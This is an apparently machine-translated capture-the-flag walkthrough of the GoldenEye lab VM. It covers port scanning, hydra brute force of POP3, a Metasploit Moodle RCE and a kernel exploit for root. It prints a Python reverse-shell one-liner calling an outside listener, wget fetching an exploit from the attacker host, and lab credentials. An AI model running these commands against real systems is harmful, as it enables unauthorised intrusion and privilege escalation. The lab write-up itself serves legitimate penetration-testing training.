brief introduction The project is based on the theme of the great James Bond film golden eye. The goal is to get the bottom flag TXT text information, the project is a necessary project environment for OSCP examination and training, and the author rated the environment as the penetration intermediate level difficulty. Next, no matter the zero basic learning infiltrators, some basic infiltrators or even high-level infiltrators can learn some skills and knowledge of the red team after reading this article.
From beginning to end, the project will use information collection - > brute force cracking - > remote code injection - > CMS rce - > right lifting, and finally get the flag Txt process, then some small skills used in the five modules will be demonstrated in the article. I hope you can move your hands to learn penetration with me.
Please note that:
This article is only used for technical discussion and research. These terminals or servers reproduced in all notes are infiltrated in a self built environment. I will use Kali Linux as the attacker machine for this learning. The technology used here is only for learning and educational purposes. If the listed technology is used for any other purpose, our website and the author are not responsible.
1, Information collection
Information collection is very important. Only with information can we know what to do next. Next, we will use nmap to demonstrate information collection:
1. nmap mining information
Scan and mine local IP address information:
nmap -sS -sV -T5 -A 192.168.4.202
It is found that ports 25 and 80 are open. Port 25 is an SMTP port service. Port 80 scans the system of ubantu. The version of apache is 2.4.7. Next, visit port 80 of http.
2. Mining HTTP services
visit: http://192.168.4.202 , the displayed text prompts a clue that goes into the / sev home / directory.
User: UNKNOWN Naviagate to /sev-home/ to login visit http://192.168.4.202/sev-home/ the result requires login, At this time, there is no user name and password information. Continue to enumerate and find the user name and password information!
At this time, go to the http home page to view the source code:
3. Mining JS information
stay http://192.168.4.202/ Page view source code:
<script src="terminal.js"></script> visit: view-source:http://192.168.4.202/terminal.js
Through the dialogue, we can know that there are two people's names in the information and the password information is told.
Get user names: Boris, Natalya
After obtaining the password, you can see that it is HTML encryption:
4. HTML decryption
There are thousands of ways to decrypt. This project is the first one. There will be many projects to demonstrate to you later. First, we will familiarize you with the artifact Burpsuiter to decrypt HTML: kali has its own Burpsuiter tool
After the Burpsuiter is opened, the HTML is cracked and obtained at the Decoder
Final account password: boris/InvincibleHack3r
5. Information page enumeration
Through the HTML password information of the first two user names, the correct user name and password login are obtained http://192.168.4.202/sev-home/ , enumerate the information after login:
F12 Information found in debugging interface
As shown in the figure:
is very effective, we have configured our pop3 service to run on a very high non-default port
This environment enables the pop3 service to be configured to run on a very high non default port, which also requires full port information enumeration.
6. nmap full port information enumeration
From the above message, we can know that an active POP3 service is running on a non default port for nmap full port scanning:
nmap -p- 192.168.4.202 (-p-: Full port scan -p3306: Scan 3306 ports only)
55006/tcp open unknown 55007/tcp open unknown
We can see that 55006 and 55007 are open, but we can't know what service it is. Enumerate the version information.
7. nmap version information enumeration
Two open ports, 5500655007, were found. The service details of the scanning port are as follows:
nmap -sS -sV -T5 -A -p55006,55007 192.168.4.202
It can be seen from this information that these two ports have opened the mail service of pop3. So here we collect and summarize the information and find that the other party's two users Boris and Natalya and the mailbox service have opened. Then there must be email information communicating with each other. The next purpose is obvious. Know the account and password of the mailbox and enumerate the information after logging in.
2, Brute force cracking - Information enumeration
1. hydra brute force cracking
Next, try to use brute force cracking. The user name "boris" found in the previous step can brutally crack the pop3 service through Hydra:
echo -e 'natalya\nboris' > 12.txt ---Write two user names to txt In text
Write text via username and password:
Then hydra blasting:
hydra -L dayu.txt -P /usr/share/wordlists/fasttrack.txt 192.168.4.202 -s 55007 pop3 -L Reference user password text -P Reference password text
After waiting for 2 ~ 5 minutes, the password information of natalya and boris users is successfully exploded.
Obtain two groups of account passwords:
[pop3] host: 192.168.4.202 login: natalya password: bird [pop3] host: 192.168.4.202 login: boris password: secret1! User: boris password: secret1! User: natalya password: bird
2. Information collection
Check the email envelope content enumeration through NC login pop3. There are three email messages in boris information, but only some conversation information. In the second email, natalya prompted the email sent to boris, saying: I have obtained your password information! Next, enumerate natalya mail.
natalya user login email to view information:
nc 192.168.4.202 55007 ---Login mailbox user natalya ---log on user pass bird ---Login password list ---View the number of messages retr 1~2 ---View message content
You can see that in enumerating natalya email information, the second email directly prompts the user name and password, and there is a domain name inside. It also prompts that you need to point to the domain name in etc/hosts to access normally.
user name: xenia password: RCP90rulez! Domain: severnaya-station.com website: severnaya-station.com/gnocertdir We now add the local domain name according to the email prompt: severnaya-station.com
3. HOSTS local file settings
HOSTS exists in both windows and linux environments. Its function is to point the IP address to the domain name. When accessing the domain name locally, it will be transferred back to the IP address information, and the page can be accessed normally.
gedit /etc/hosts 192.168.4.202 severnaya-station.com
Just add this message at the end.
4. Background information collection
Visit Severnaya station COM / gnocertdir address:
As soon as I logged in, I saw moodle, an open source CMS system:
Continue to click and find that you want to log in. Log in with the user password obtained by email. Click: Intro to GoldenEye to log in and use the user name and password obtained from the second email of natalya mailbox to log in:
User name: xenia
In the information enumeration: Home/ ▶ My profile / ▶ Messages -- > a message is found, the content is found, and the user name is doak:
A third user name information was found.
5. Brute force cracking of doak users
With the same nature as the previous brute force cracking, continue to brute force crack doak users.
echo doak > 11.txt ---Write user name to txt In text hydra -L 11.txt -P /usr/share/wordlists/fasttrack.txt 192.168.4.202 -s 55007 pop3
[pop3] host: 192.168.4.202 login: doak password: goat Get user name and password: doak/goat
You have successfully obtained the user name and password. Next, log in to the email to view the information.
6. Mail information enumeration
Continue to log in to the mail through the above obtained doak password.
nc 192.168.4.202 55007 ---Login mailbox user doak ---log on user pass goat ---Login password list ---View the number of messages retr 1 ---View message content
The email message said that it provided us with more login credentials to log in to the application. Let's try logging in with these credentials.
user name: dr_doak Password: 4 England!
7. Log in to CMS with a new account password
Log in to doak to obtain the user name and password information, and then log in to: Home/ ▶ Found on the right of My home: s3cret TXT text information, download and view:
Also found that this is Moodle Used 2.2.3 edition
Something juicy is located here: /dir007key/for-007.jpg
txt file indicates that the administrator credentials are hidden in the image file. Let's open the image in the browser to view its contents.
8. Image steganography information enumeration
Visit page: Severnaya station com/dir007key/for-007. jpg
Download to local:
According to the email prompt, let's check the picture content. After downloading the picture, we can use:
·binwalk (reverse route analysis tool)
·strings (identify dynamic library version instruction)
The three most commonly used tools to view the underlying content of jpg files, using exiftool tool:
It is found that kali is not installed. Install it first:
Exiftool gets the bottom content of JPG file: exiftool for-007 jpg
It can be seen that there is a base64 encoding information in the normal information display.
Or use strings to get the bottom content of JPG file: strings for-007 jpg
Use the above commands to view the base64 encoded hidden information: eFdpbnRlcjE5OTV4IQ==
9. Base64 decoding
Use Burpsuite to crack the password: xWinter1995x!
In the js file clue, it is said that this is the password of the administrator user. Continue logging in to the application as an administrator user.
User name: admin
10. admin background information enumeration
Log in through the obtained admin user name and password:
This is version 2.2.3 used by Moodle, which searches for available vulnerabilities on the Internet.
It is found that CVE-2013-3630 vulnerability can be exploited.
3, Getshell tips
1. MSF take shell
1) Login to MSF framework
There are many exploits in this version. Since we need interactive access on the target computer, I chose to use remote code execution (RCE) exploit. Using the msf framework:
msfconsole ---get into MSF Frame attack interface search moodle ---lookup moodle Module of type attack
By searching moodle, we found that there are many exploitable vulnerabilities. Just choose exp of CVE-2013-3630.
2) Exploit the vulnerability to get the shell
show option to view the condition information required by the exp script:
use 1 ---Call 1 exploit/multi/http/moodle_cmd_exec Call attack script set username admin ---Set user name: admin set password xWinter1995x! ---Set password: xWinter1995x! set rhost severnaya-station.com ---set up: rhosts severnaya-station.com set targeturi /gnocertdir ---Set Directory:/gnocertdir set payload cmd/unix/reverse ---set up payload: cmd/unix/reverse set lhost 192.168.4.227 ---set up: lhost 192.168.4.227(Local required IP) exploit ----Execute command
You can see that the shell is obtained after filling in the URL, directory, account password and other information. It is found that it is an ordinary user permission, so the next idea is to raise the right.
3) powershell settings
If MSF cannot be executed to obtain a rebound shell, the script uses powershell commands. Since we have used the administrator admin user login page, we need to modify it in the settings:
Home / ▶ Site administration / ▶ Plugins / ▶ Text editors / ▶ TinyMCE HTML editor
This can only be saved by save.
2. Code execution rebound shell
You can get the shell through MSF, but there are still many loopholes in the background. Next, we will demonstrate a rebound shell using remote code execution commands:
Home / ► Site administration / ► Server / ► System paths
Go to this page and put a sentence into:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.211.55.28",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
After saving, when the other server environment triggers the condition at a certain point, the command will be executed. At this time, use NC to start listening locally to obtain the interactive shell:
nc -vlp 6666
At this time, go to the home page to trigger the execution of the command:
Home / ► My profile / ► Blogs / ► Add a new entry
Click the tick to turn around. At this time, the remote code execution has been triggered. Go back to the nc monitor:
At this time, you get a rebound shell, a shell with WWW Data permission.
4, Right raising
The previously obtained is a low authority www data user. We need to raise the authority to root to achieve our ultimate goal.
1. Kernel power raising
Execute tty because the obtained permission has no normal interaction:
python -c 'import pty; pty.spawn("/bin/bash")' ---take shell conduct tty uname -a # View permissions
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Google search: Linux ubuntu 3.13.0-32 exploit
Get exp version: 37292 C can use the kernel to raise rights.
2. kali kernel script
Search for exp version information:
searchsploit 37292 ---search kali Local exp 37292 attack script information in the library cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/desktop/ ---The directory can be modified by yourself
kali comes with many EXP attack scripts, which can be directly searched and copied locally.
3. CC compile EXP
Since there is no gcc in the project environment after the first operation upload, the script needs to be changed to cc:
gedit 37292.c ---Text open Line 143 gcc Change to cc ---Write next
Then start the http service in the local directory:
python -m SimpleHTTPServer 8081
This is 37292 The C attack authorization script is under HTTP in this directory. Execute wget in the project environment, download the file and CC compile it.
4. Kernel authorization Root
First download the file to the local through wget
wget http://192.168.4.222:8081/37292. C -- WGet downloads files under http service
After uploading the script, you can see the usage of cc compilation in the exp interface:
cc -o exp 37292.c ---C Linguistic CC Code compilation point c file chmod +x exp ---Compile into executable file, and ./exp ---Point bar execution id ---View current permissions cat /root/.flag.txt ---read root Lower flag information
get flag: 568628e0d993b1973adc718237da6e93
Through the kernel authorization script, the Root permission and flag are successfully obtained Txt information.
Through the above learning, we have learned some technical means of the red team's small skills, completed the implementation of the project from information collection to kernel power lifting, and learned a lot of skills, such as the compilation and use of nmap, hysra, POP3 NC, MSF, EXP, etc. we hope our partners can repeat the actual operation! To consolidate their own penetration technology and skills!
I hope you can improve your security awareness. Without network security, there will be no national security!